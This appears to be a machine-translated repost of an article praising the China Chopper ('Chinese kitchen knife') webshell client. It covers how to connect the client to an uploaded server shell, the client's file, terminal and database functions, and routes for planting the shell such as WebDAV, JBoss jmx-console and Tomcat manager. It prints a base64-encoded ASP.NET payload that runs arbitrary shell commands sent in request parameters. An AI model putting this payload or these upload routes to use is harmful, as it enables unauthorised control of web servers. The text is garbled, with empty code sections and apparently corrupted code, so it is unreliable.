Shulou(Shulou.com)06/01 Report--

It is believed that most webmasters use FTP to manage web space, but FTP is extremely weak compared to kitchen knives. As far as database management is concerned, phpmyadmin and Imperial can only manage mysql databases and can't compare with kitchen knives in terms of software size. If you are proficient in SQL syntax, why do you need PHPMYADMIN? And the Chinese kitchen knife with its special × × shape interface, supports MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, supports the database connected by ADO.

Server:

The code running on the server side is as follows:

PHP:

ASP:

ASP.NET:

JSP:

(note: ASP.NET needs a separate file or this file is also in Jscript language)

Fork before the upload vulnerability demonstration, using burpsuite to grab the package to upload finally talked about using a kitchen knife to connect to see how to achieve:

Right-click / add in the main view, enter the server address, connection password (this must be) in the pop-up dialog box, select the correct script type and language code, and save it, you can use file management, virtual terminal and database management. If nothing else is wrong, then you may have chosen the wrong language code.

1. File management: cache download directory, and support offline view of cache directory, upload and download modified files

two。 Virtual terminal: humanized design, easy to operate; (enter HELP for more usage)

3. Database management: graphical interface, supporting MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS to support ADO-connected databases.

(for database connection methods under various script conditions, please click the configuration button in the upper left corner of the database management interface.)

PHP script:

Type can be one of the MYSQL,MSSQL,ORACLE,INFOMIX

Host address the host address can be a machine name or an IP address, such as localhost

The user name of the database user that connects to the database, such as root

Database password

The password to connect to the database, such as 123455

ASP and ASP.NET scripts:

Type type can only be ADO

ADO configuration Information

ADO connects to various databases in different ways. For example, the configuration information of MSSQL is

Driver= {Sql Server}; Server= (local); Database=master;Uid=sa;Pwd=123456

4. Website spider function: weave the directory structure of a website. The downloaded list file exists on the desktop. Right-click the menu / load the URL list to get the directory structure according to the address.

The uploading mechanism of Chinese kitchen knife:

Upload via WebDAV file

Upload through the Tomcat management page of JBoss jmx-console or Apache

Remote code execution download

Transmission after access by other means

Its * payload is encoded as follows:

Password=Response.Write ("- > |")

Var err:Exception;try {eval (System.Text.Encoding.GetEncoding (65001) .GetString (System. Convert.FromBase64String ("dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0luZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0luZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D"), "unsafe");} catch (err) {Response.Write ("ERROR://"% 2Berr.message);} Response.Write ("|

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.